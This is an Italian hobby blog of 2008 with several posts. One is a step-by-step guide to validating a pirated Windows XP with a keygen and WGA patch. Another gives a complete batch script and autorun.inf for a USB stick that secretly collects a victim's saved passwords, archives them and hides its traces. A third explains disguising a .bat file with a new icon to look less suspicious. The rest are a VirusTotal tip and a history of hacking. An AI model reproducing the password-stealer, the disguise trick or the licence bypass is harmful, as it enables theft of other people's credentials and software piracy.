Cosa ne pendi del blog?

sabato 16 agosto 2008

Sito

Ecco da dove prendo spunto per i miei post:

Click qui per un sito pieno di cose interessanti

Buona lettura!

martedì 5 agosto 2008

Rendere windows originale

Come tutti oramai sapete il WGA è il controllo di genuinità di Microsoft Windows XP.
Per scaricare dal sito Microsoft Update gli aggiornamenti di sicurezza è necessario convalidare la propria copia di Windows e WGA è il mezzo attraverso il quale questo avviene.
WGA si occupa di controllare il numero seriale installato in Windows XP. Se il seriale risulta regolarmente acquistato allora nell'80% dei casi la copia viene convalidata e si potranno scaricare gli aggiornamenti di sicurezza e i vari programmi che richiedono convalida WGA. Se invece la copia non viene convalidata, perché avete inserito un codice seriale non valido durante l'installazione, succede che vi compare, come oramai sapete, un fastidiosissimo messaggio che vi ricorda che la vostra copia è pirata, e in più non potrete aggiornare le patch di sicurezza, ne' tantomeno programmi che richiedono convalida WGA.
La guida che seguira' è atta a trovare una soluzione definitiva al problema e quindi a rendere la vostra copia di Windows XP regolare, genuina e senza più bisogno di trovare una soluzione per ogni WGA mese per mese.
Questa guida si rivolge a chi, nonostante abbia acquistato una copia originale, per un puro errore (si stima il 20% dei casi) si ritrova nella posizione di avere un blocco WGA e si dimostra come è possibile rendere una copia valutata come pirata in una genuina.
Per dimostrare questo useremo nell'esempio, per puro scopo educativo :sant: , un generatore di seriale VLK (1.Windows XP Keygen.exe) perfettamente valido e che simula un seriale di Windows XP regolarmente comprato.
Verra' mostrato quindi come cambiare il vecchio seriale con il nuovo e dimostrato che la copia, dopo quest'operazione, sara' perfettamente valida.
Il test è stato effettuato su una macchina XP virtuale con risultato garantito 100%.
Ovviamente coloro che hanno un seriale comprato non devono usare il generatore di seriale, ma devono inserire il loro product key regolarmente acquistato.

1) Cosa vi occorre per rendere la copia di XP genuina e immune dal WGA?
- Scaricare il pacchetto WGA Patcher Permanent Kit
- Scompattare con Winrar o 7zip la cartella dove desiderate.

2) Ho applicato la guida, ma esce Validition Control not Installed ?
- Tutto ok :ok: dovete solo collegarvi al sito di Microsoft Update e vi verrà autenticata la copia.

3) Ho applicato la guida, ma esce cryptographic errors detected?
- E'sufficiente rinominare il file legitcheckcontrol.dll in legitcheckcontrol.bak in C:\windows\system32 .

4) Quando uso Windows XP Keygen non mi accetta il seriale: An error has occured. This was probably caused by the keying of an ivalid number. Please check it and try again?
- Controllate di aver selezionato dal menù a tendina del Windows XP Keygen il seriale corrispondente a Windows XP PRO VLK.
- Se non funziona: rinominate per prima cosa il file legitcheckcontrol.dll in legitcheckcontrol.bak in C:\windows\system32 e riprovare.

5) Cosa c'è dentro la cartella WGA Patcher Permanent Kit e a cosa serve ogni file?

image



6) Con quali sistemi operativi funziona?
- Funziona con Windows XP con SP2 oppure senza SP2, Server 2003.
- NON funziona con Windows Media Center.
- Per farlo funzionare con Windows XP Home dovete avere un seriale originale valido di XP Home.

image

La figura sopra indica che la copia non è valida

image

Ulteriore conferma di copia non valida nella figura sopra

image

Passo 1: Eseguire il file Windows XP Keygen.exe per trovare un seriale valido e appuntarlo da qualche parte, o lasciare la finestra aperta.
1) Vale solo per Windows Xp Professional (con o senza Service Pack).
2) Non vale per XP Home Edition. Per quest'ultima versione dovete "recuperare" un seriale valido e proseguire con la guida.

image

Passo 2: [Per evitare blocchi e interferenze disattivate momentaneamente l'antivirus] Eseguire il file Keyfinder.exe. Viene mostrato il vecchio seriale.
Per cambiarlo con il nuovo: Options/Change Windows Key.

image

Inserire il nuovo seriale di cui siete in possesso (passo1) e cliccare Change e OK

image

Passo 3

: Eseguire WGA fix.exe e cliccare Si.

image

Passo 4: Per eseguire MGADiad.exe (per verificare che la copia sia diventata genuina) cliccare Continue

image

Fine: Controllare Validation Status, nella prima riga in alto. Se indica Genuine la copia di Windows XP è regolarmente valida e non avrete mai più il problema WGA. :woot:

image

Dopo aver applicato la patch è possibile scaricare tutto gli aggiornamenti che si desiderano

image

Ulteriore immagine che conferma l'installazione di patch scaricate dal sito dopo aver applicare la genuinità permanente.

lunedì 4 agosto 2008

Nascondere account

Il vostro PC è condiviso da due account?? Nascondete il vostro!

Il sito web americano INTELLIADMIN
ha postato una guida su come nascondere il vostro account..

Scarichiamo da (QUA) questo programma.
Fatto questo apriamo XPUserHide.exe e avviamolo.
Vi apparirà una finestra con tutta la lista dei nostri account:
Quelli con il segno di spunta sono quelli che vengono mostrati all'inizio mentre quelli scritti in rosso sono quelli degli amministratori.
Se volete nasconderne uno, mettere un segno di spunta su quello desiderato.
Dopo di che se vogliamo entrare con uno nascosto premiamo due volte CTRL+ALT+CANC....
Scrivete il vostro account nascosto e..FATTO!

Recuperare le pswd del pc con un chiavetta USB

Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.
Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.

Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.

Collegatevi alla pagina del sito web di Nirsoft.net per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.

Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.

A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su rarlab.com/download.html e fate click sulla voce WinRAR 3.60 (Graphic and command line). Dopo aver installato Winrar, andate su Start/Risorse del computer/C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.

Adesso aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

Al termine del file scrivete, invece, le righe:

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %­USERNAME% >> log.txt
@echo USERDOMAIN = %­USERDOMAIN% >> log.txt
@echo USERPROFILE = %­USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %­TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%­random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.

La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %­USERNAME% >> log.txt
@echo USERDOMAIN = %­USERDOMAIN% >> log.txt
@echo USERPROFILE = %­USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %­TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%­random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella Chiavetta.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

[autorun]
open=lancia.bat
action=Preleva password


Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta.
Si aprira una finestra. Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

Aiutino per antivirus

Si chiama VirusTotal

DESCRIZIONE: Se abbiamo il dubbio che il nostro Antivirus non riesca rilevare dei malware (trojan, backdoor, spyware etc..) che si sono appena aggiornati, grazie a VirusTotal possiamo fare la scansione online di un file che ci insospettisce...
Ci aiuteranno i 30 antivirus del mercato più aggiornati che sono:

* AhnLab (V3)
* Aladdin (eSafe)
* ALWIL (Avast! Antivirus)
* Authentium (Command Antivirus)
* Avira (AntiVir)
* Bit9 (FileAdvisor)
* Cat Computer Services (Quick Heal)
* ClamAV (ClamAV)
* CA Inc. (Vet)
* Doctor Web, Ltd. (DrWeb)
* Eset Software (ESET NOD32)
* ewido networks (ewido anti-malware)
* Fortinet (Fortinet)
* FRISK Software (F-Prot)
* F-Secure (F-Secure)
* Grisoft (AVG)
* Hacksoft (The Hacker)
* Ikarus Software (Ikarus)
* Kaspersky Lab (AVP)
* McAfee (VirusScan)
* Microsoft (Malware Protection)
* Norman (Norman Antivirus)
* Panda Software (Panda Platinum)
* Prevx (Prevx1)
* Rising Antivirus (Rising)
* Secure Computing (Webwasher)
* Softwin (BitDefender)
* Sophos (SAV)
* Sunbelt Software (Antivirus)
* Symantec (Norton Antivirus)
* VirusBlokAda (VBA32)
* VirusBuster (VirusBuster)

VirusTotal: QUA

Storia dell hacking

Tutto inizio' nell' inverno del 1958-59 in un club del Massachussetts Istitue of Tecnology,
IL THEC MODEL RAILROAD CLUB. C'erano due gruppi all'interno del Tmrc: un gruppo costruiva
e dipingeva modellini di determinati treni di valore storico o affettivo , oppure creava scenografie realistiche per la rete. Un altro gruppo girava intorno al S&P, la sottocommissione per lo studio dei segnali e dell'energia del club, e si preoccupava di più
per quello che accadeva sotto il modellino ferroviario.
I membri del S&P erano ossessionati dai cavi, dai relè e dai commutatori che facevano funzionare
il sistema.Gli studenti avevano principalmente il problema di procurarsi i pezzi, far funzionare insieme apparecchiature che non avevano nulla in comune,e proprio cosi' posero le basi di un fenomeno destinato a diffondersi in tutto il mondo.
All'interno del club si usava un linguaggio molto particolare, in modo che se una persona estranea al club si fosse intrufolata nelle loro discussioni non sarebbe riuscita a capirci nulla. Quando un pezzo di un marchingegno non funzionava era (munged), uno che insisteva a studiare nei corsi era un (tool),la spazzatura era detta (cruft), un progetto intrapreso o un prodotto costruito non soltanto per uno scopo specifico ma che portasse con se il piacere scatenato della pura partecipazione era detto (hack).I più produttivi tra quelli che lavoravano
al Signal and Power si definivano con grande orgoglio (hacker).
Gli hacker credono nella possibilità d'imparare lezioni essenziali sui sistemi e sul mondo, smontando le cose, e osservando come funzionano, usando questa conoscenza per creare cose nuove,ancor più interessanti.Secondo questi ultimi,tutta l'informazione deve essere libera. Detestano qualsiasi persona, barriera fisica o legge che tenti d'impedirglielo.
Questo e' vero soprattutto quando un hacker vuole aggiustare qualcosa che e'guasta e necessita
di miglioramento. I sistemi imperfetti fanno infuriare gli hacker, il cui istinto primario e'
di correggerli.
I membri dell'S&P procuravano il loro materiale nei magazzini del MIT, preferendo la notte per non essere scoperti.
Si sentivano discepoli a vita dell'hands-on imperative, l'imperativo di metterci su le mani, un principio che e' alla base dell'Hacking.
Questi ultimi, scoprirono che nella stanza EAM del palazzo 26 del MIT, vi era un IBM 704, per allora il sogno di tutti gli amanti dell'elettronica,in quanto il primo computer che provasse ad imitare la mente umana, ma non potendo giungere fino ad esso, si limitarono a studiarne la funzionalità'. Fu grazie a uno dei vecchi membri del TMRC, che gli Hacker riuscirono a poter lavorare su un computer (il TX - 0 ), che si trovava anch'esso nel palazzo 26 del MIT, ma a differenza dell'IBM704, intorno al TX-0_ non vi era lo stesso timore di burocrazia.
Di regola il TX-0 era mantenuto in funzione 24 ore su 24: allora i computer costavano troppo per permettersi il lusso di lasciarli inattivi tutta la notte e, inoltre, sarebbe occorsa una procedura troppo lunga per rimettere in funzione la macchina una volta spenta. Cosi' gli Hacker del TMRC cambiarono presto il loro stile di vita per adattarsi alle esigenze del computer.
Si prenotavano per ogni turno possibile, sperando che qualcuno mancasse al proprio appuntamento per sostituirlo.
La prima cosa a cui lavoro' Dennis ( un membro del TMRC ) , fu un assemblatore.
Era qualcosa che usava abbreviazioni simboliche di tre lettere per rappresentare istruzioni per la macchina - in linguaggio macchina, che consisteva di numeri binari 0 e 1. Il TX - 0 aveva
un linguaggio assembly piuttosto limitato, per il modo in cui era fatto, assegnava soltanto due bit per ogni parola di 18 bit alle istruzioni del computer e potevano essere usate solo 4 istruzioni.
Ogni cosa che il computer faceva derivava da una di quelle quattro istruzioni.
L'altro programma a cui lavoro' era qualcosa di ancor più avanzato un debugger il Flit.Questo
fu un salto di qualità,perché permise agli utenti la composizione originaria di programmi sulla macchina. Svilupparono in oltre un linguaggio di programmazione il LISP.

Nel 1961 la Dec dono' al MIT il Pdp1.Il Pdp1 sarebbe divenuto famoso come il primo minicomputer, progettato non per macinare grandi quantità di numeri ma bensì per la ricerca scientifica, per l' elaborazione degli enunciati matematici e per l'Hackeraggio.
Nell' estate del 1961, gli Hackers lavorarono ad un progetto molto ambizioso per quell'epoca,
un gioco nel quale era simulata una battaglia stellare, lo Spaceware. Quest' ultimo dimostro' che le potenzialità dei computers andavano ben oltre il semplice calcolo scientifico, in quanto utilizzava la grafica per immagini interattive.

Nel 1963, Stewart Nelson, famoso Hacker del tempo, capi' che alcune particolari note emesse dall' altoparlante del Pdp1, potevano essere utilizzate per entrare nel sistema telefonico, quindi creo' un'interfaccia la quale collegandosi al telefono, avrebbe lanciato un segnale che sarebbe rimbalzato su una linea ordinaria, permettendogli di andare in giro per tutto il meraviglioso sistema dei telefoni, il tutto completamente gratis.
Nelson aveva dimostrato a un gruppo di programmatori del Pdp1 come una solitaria matricola del college potesse ottenere il controllo di un sistema telefonico quasi centenario, non per lucro, ma per il puro e semplice gusto dell'esplorazione.
Nonostante l'interesse iniziale di Nelson per il Pdp1 fosse rivolto al phone haching, in seguito il suo interesse si complessificò al punto che,alla fine ,su quella macchina programmava di tutto. Spesso si avvicinava alla consolle mentre un laureando annaspava su qualche programma,poi iniziava a occhieggiare da dietro le spalle dello studente,il che faceva annaspare ancor di piu' il laureando, e alla fine sbottava dicendo: SE RISOLVO IL TUO PROBLEMA, MI LASCI
IL COMPUTER?! Nelson era una creatura dell'etica hacker, realizzava sistemi, faceva hack per
il monitor e creava ogni sorta di stranezza. Scrisse anche un hack di connessione tra il computer della Triple-I al settimo piano e il pdp- 6 al nono che mandava segnali tramite un oscilloscopio su una linea e una telecamera su un'altra. E infine, sia con la pratica che con la teoria, divenne un leader nell 'arte nera del lock hacking (l'hackeraggio di serrature).
L'ardua sfida consisteva nell'aprire ogni sorta di porta, schedario,cassetta di sicurezza, cassaforte e altro,solo per il piacere di non avere mai barriere.Per un hacker una porta chiusa
è un insulto, e una chiusa a chiave è "un oltraggio".
Un altro mitico personaggio che bisogna assolutamente citare è David Silver, quest'ultimo figlio di uno scienziato che insegnava al Mit,fin da bambino aveva dimostrato eccellenti qualità
di hacker.
Anche se a scuola non era un asso a causa della sua dislessia, sbalordiva tutti per la sua straordinaria inventiva, basti pensare che all' età di dieci anni torno' a casa con un'antenna radar, la smonto', e la uso' come specchio parabolico: con un microfono era in grado di captare conversazioni a centinaia di metri di distanza.
Qualche anno dopo, grazie alle influenze del padre, David, poté usare un terminale connesso al Compatible time sharing system dell'Ibm 7094,e fu cosi' che comincio' a darsi da fare con il suo primo programma scritto in Lisp,e traduceva frasi della lingua inglese in un latino maccheronico.
Poi incomincio' a lavorare in un programma che avrebbe pilotato un piccolo robot fatto in casa,che chiamò "la cimice" e che aveva assemblato con relé di vecchi telefoni trovati da Eli. Agganciò la "cimice" al connettore e scrisse in linguaggio macchina un programma che permetteva al robot di muoversi sulle due ruote. Dato che agli hackers interessava poco l'età delle persone, permisero all' ormai quattordicenne David di frequentare il nono piano per dare
il suo contributo all'hackeraggio.
Silver diede subito prova di un certo valore, offrendosi spontaneamente per fare noiosi lavoretti di lock hacking. Era il periodo in cui l' amministrazione aveva istallato un nuovo complicato sistema di serramenti ad alta sicurezza,e il compito del ragazzo era quello di smontare le serrature e studiare i sistemi di protezione . Silver considerava gli hacker come suoi maestri, ma questi ultimi sapevano che il ragazzo aveva la stoffa del vincente, "winnitude" nel loro linguaggio.
Più avanti David pero' volle impegnarsi in qualcosa di piu' serio e inizio' a scrivere un nuovo programma sul Pdp-6;voleva modificare la sua "cimice" in modo che usasse la telecamera per andare a prendere oggetti sistemati sul pavimento.
Silver usava una tecnica chiamata "image subtraction" ( sottrazione d'immagine) che permetteva
al computer di sapere dove la "cimice" si trovasse in ogni momento ; la telecamera scrutava in continuazione la scena per vedere cosa si fosse mosso e faceva attenzione a ogni cambiamento all' interno dell'immagine, poi il robot si muoveva verso il bersaglio lasciato cadere e lo rimuoveva.
Poco più tardi incominciarono a nascere i primi negozi dove gli hacker potevano acquistare quanto di più strano gli servisse per i loro lavoro.
Uno di questi era il Quinn, nella Bay Area a Cambridge, dove gli hacker del Tech model railroad
si recavano per procurarsi gli scambi e i rele'. Li' si discuteva dei prezzi delle schede elettroniche usate ,sugli oscilloscopi governativi di seconda mano e su grandi quantità di led
di orologi digitali.
Vi era tutto ciò che serviva, condensatori, diodi, transistor, piastre circuitali vergini, potenziometri, interruttori, prese di corrente, morsetti e cavi. Più avanti gli hacker si resero conto che era giunto il momento di diffondere il computer tra le masse,lasciando che la gente interagisse direttamente con le macchine, allora si inventarono la Mits, una azienda che sotto ordinazione spediva a soli quattrocento dollari una scatola con i pezzi di un computer da montarsi a casa. Gli hobbisti avrebbero ricevuto il kit dell'Altair,e montarlo sarebbe stato per loro un corso di logica digitale, inventiva e abilita' nella saldatura.
Una volta finito il lavoro, il problema era che si sarebbero ritrovati con in mano solo una scatola di luci lampeggianti con solo 256 byte di memoria. Si poteva immettere un programma solo digitando numeri ottali attraverso quei piccoli interruttori che facevano a brandelli le dita.
Sembra che l'unica proposta della Mits per quelli che riuscivano a finire la costruzione del computer fosse un programma in linguaggio macchina che si poteva inserire solo usando la fila di piccoli interruttori sul pannello frontale. Era un programma che utilizzava le istruzioni del chip 8080: LDA,MOV,ADD, STA E JMP.
Se tutto andava bene, il computer avrebbe fatto la somma di due numeri. L'utente dal canto suo doveva tradurre il codice dei led lampeggianti e convertirli mentalmente dalla loro forma ottale in numero decimale.
Tra i prodotti della Mits vi fu anche una nuova versione del Basic. Invece di dover sudare a battere i programmi in linguaggio macchina su nastro di carta e poi dover di nuovo tradurre in digitale, si al suo impiegato che lo carico', e lo diffuse gratuitamente.
La gente arraffo' i nastri e cosi' la prima versione del Basic fu in circolazione ancora prima della sua uscita ufficiale.
Bill Gates si arrabbio' furiosamente, ritenne l'azione del noto hacker un vero e proprio furto e scrisse una lettera aperta sulla pirateria, dove spiegava che i programmatori che avevano creato il programma non potevano permettersi di lavorare per nulla..
Dopo il casino del software causato dalla lettera di Gates,Tom Pitman decise di intraprendere un azione il più di massa possibile.
Egli sosteneva che se il programma non fosse costato 150 dollari la gente lo avrebbe comprato, pertanto decise di scrivere un interprete Tiny Basic e venderlo per la somma di 5 dollari.Alcuni inviarono 10 dollari dicendo che cinque era troppo poco.
Industrie di miliardi di dollari avevano introdotto sul mercato combinazioni di terminali - computer che non chiedevano assemblaggio, computer che potevano essere venduti come elettrodomestici.Una di queste macchine era il Commodore Pet, mentre l'altro era il Radio shack Trs - 80, un computer in plastica, fatto in serie e venduto in masse in centinaia di negozi sparsi su tutta la nazione.
Uno degli uomini che dal punto di vista finanziario si era arricchito più' di tutti era Lee Felsenstein, il quale incontratosi con Adam Osborne, ingegnere e scrittore di libri sui personal computer, decise di progettare insieme a quest'ultimo un computer cosi' piccolo da poter essere trasportato ovunque.
La macchina, conosciuta col nome di "Osborne 1", aveva l'involucro di plastica e uno scomodo schermo da 5 pollici, ma nonostante tutto rese i suoi creatori multimilionari.
Efrem Lipking, hacker purista, sostenne che l'industria di Lee e Osborne fosse un mostro che creasse solo giocattoli di lusso per la classe media. Lui riteneva che il computer fosse diventato non più una scatola nera di cui aver paura, ma un oggetto che andava persino di moda. Ma Lee si difese dicendo che quel denaro cosi' infetto procurato offendendo l'etica hacker era pero' quello che aveva assicurato il salario allo stesso Efrem, ma Lipkin rispose che da quel momento non sarebbe stato più cosi' in quanto avrebbe dato le dimissioni.
Il 1982 fu l'anno che vanto' il nascere di un innumerevole numero di nuove ditte come ad esempio quella di Steve Wozniak e del suo Apple, simbolo del sogno hacker. Il suo prodotto principale era codice, righe di assembly scritto su floppy che, una volta inseriti in personal computer come l'Apple, magicamente si trasformavano in fantastici giochi.Una specialità della ditta erano i giochi di tipo Adventure.
Altri due nomi da ricordare sono quelli di Ken Williams e sua moglie Roberta. Roberta che come quasi la maggior parte delle donne, all'inizio non approvava la passione per i computer del marito, diceva che era troppo dispendiosa e che era spreco di tempo . Poi, una notte, Ken, chiamò Roberta per farle vedere un gioco nel suo computer. Roberta inizialmente rifiuto', ma lui insistette e la fece sedere li accanto. TI TROVI ALLA FINE DI UNA STRADA PRIMA DI UN PICCOLO EDIFICIO DI MATTONI. INTORNO A TE C'E' LA FORESTA. UN PICCOLO RUSCELLO SCORRE FUORI DALL'EDIFICIO E GIU' IN UNA GOLA..
Era Adventure il gioco scritto dall' hacker Don Woods. E dal momento in cui Roberta brancolando nel buio rispose VA A EST.. fu totalmente presa dal gioco.
Non poté più fermarsi, trascurò anche il suo neonato di otto mesi, giocava a tutte le ore. Ken era sconvolto non poteva capire come quella donna da un giorno all'altro avesse subito quella metamorfosi, ma ne era contento in quanto finalmente accanto qualcuno che lo capisse. Ken pensò allora di comprarsi un computer più potente e acquistò un Apple, e a dispetto del ritrovato interesse per i computer, Roberta ne fu davvero entusiasta, ma disse anche che era meglio che cercassero di tirare fuori qualche soldo da quella macchina.
Ken si mise allora a lavorare su un compilatore in Fortran per l'Apple con l'idea di venderlo per un mucchio di soldi agli ingegneri e ai tecnici che volevano strumenti per fare strumenti. Assunse a part - time cinque programmatori che lo aiutarono nel progetto.Nel frattempo Roberta si mise a scrivere una storia, invento' un percorso simile ai giochi a cui aveva giocato col marito, con intrighi, personaggi, fino a quando non decise di farla leggere a KEN. Suo marito ne rimase molto colpito e decise di fare diventare il racconto della moglie un vero gioco.
Fu cosi' che nacque il famosa "Mistery hause" di cui la gente tanto s'innamoro', segui' poi un nuovo gioco scritto da Roberta "Wizard and Princess" che vendette più di sessantamila copie, seguito poi da "Time zone" ecc.. Ben presto i due giovani si trovarono a dirigere una mega azienda da milioni di dollari con impiegati e operai, era nata la Sierra.
L'ultimo dei veri hacker americani fu senza dubbio Richard Stallman, al quale piaceva essere chiamato Rms, che uso' l'etica hacker come guida per la sua opera piu' conosciuta,un programma chiamato Emacs che permetteva agli utenti di personalizzarlo senza limite.
Distribuiva gratis il programma alla condizione di rendere disponibili tutte le estensioni apportate, in modo da collaborare al miglioramento di Emacs.
Una delle cose che lo fece più infuriare, fu l'assegnazione delle password agli utenti registrati alla Mit, cosi' facendo quelli senza autorizzazione erano tagliati fuori dal sistema. Stallman fece propaganda perché questa pratica fosse abolita. Incoraggiava la gente a usare "la stringa vuota" come password, un tasto di "return" anziché una parola, per dare a tutti accesso libero ai computer . Violò anche l'algoritmo di crittazione del computer e fu in grado di accedere al file protetto che conteneva la password delle persone.
A questo punto il laboratorio "Ia lab" installò un più sofisticato sistema di password su altri computer. Non fu così facile per Stallman violare questo sistema, ma riuscì ad esaminare il programma di crittazione e, scoprì che se avesse cambiato una sola parola di quel programma avrebbe fatto apparire la password sulla consolle del sistema come parte del messaggio dell'avvenuto collegamento. Questa mania aveva infestato anche il sacro computer dell' Ia lab.
Il ministero della difesa stava minacciando di togliere la macchina dalla rete Arpanet.I buro_
crati del ministero erano preoccupati, in quanto, chiunque passasse per la strada poteva usare il computer dell' Ia lab per connettersi alle altre stazioni della rete del ministero della difesa.
Stallman sapeva che quella era la strada giusta, ma purtroppo quelli che la pensavano come lui erano diventati in pochi,i vecchi hackers si erano allontanati o lavoravano in grosse aziende,non ci sarebbe stata più' una generazione come quella, nessuno era più disposto a scambiarsi informazioni, ad andare a cena insieme per discutere di programmazione, non trovava mai nessuno con cui parlare. Stallman lascio' il Mitt, ma con un progetto: scrivere una versione del popolare sistema operativo Unix e darlo a chiunque lo volesse. Lavorare su questo Gnu ( che sta per Gnu's not Unix ) significava poter continuare ad usare i computer senza violarne i principi.
Dall'unione di kernel GNU - X nacque il LI(nus)-(G)NU-X un sistema operativo completo, liberamente distribuibile e a 32 bit, grazie al LINUX le nuove generazioni avranno la possibilità di avere sul PC di casa una potente workstation UNIX.
Si può oggi dire che personaggi come Greenblatt, Felsenstein, Worniak, Ken Williams, Jewell, Carlston e tantissimi altri hackers forse meno famosi, hanno sicuramente contribuito a salvare l' economia americana, questi uomini dalla genialità senza limiti, a volte nemici a volte fratelli,hanno lavorato per progresso del mondo e per questo vale la pena ricordarli.
Fonte:B[r]oSsDaN17

Cambiare icona a un file .bat

Ecco la guida per cambiare l'icona ad un file batch per renderlo meno sospetto...
Programmi Necessari:
Bat To Exe Converter
Exe To Icon Converter

Teoria:
Noi in teoria dovremmo convertire il file .bat in exe con il programma relativo e prima della conversione allegarci un'icona (necessariamente in formato .ico)
Da dove ricaviamo questa icona?
è possibile reperirla da qualunque altro file contenente un pakketto di icone ed esportare quella ke ci fa più piacere...

Aprite "Bat To Exe Converter"...

Dovrebbe aprirsi questa skermata:

Punto 1:Bat da caricare
Punto 2:Icona da abbinare

Come prendere l'icona da abbinare in formato .ico:
Aprire "Exe to icon converter", selezionare una libreria oppure qualsiasi altro file ke contenga icone e apparirà qst skermata:

Dopo l'attesa del caricamento selezionate l'icona ke preferite con il tasto destro e clikkate su "save the icon" e ve la esporterà in formato .ico!
Dopo aver fatto tutto qst tornate alla finestra di "Bat to exe converter" e al punto 2 caricate l'icona da voi esportata, clikkate su "compile" e il gioco è fatto...
Vi troverete il vostro bat con l'icona cambiata ^_^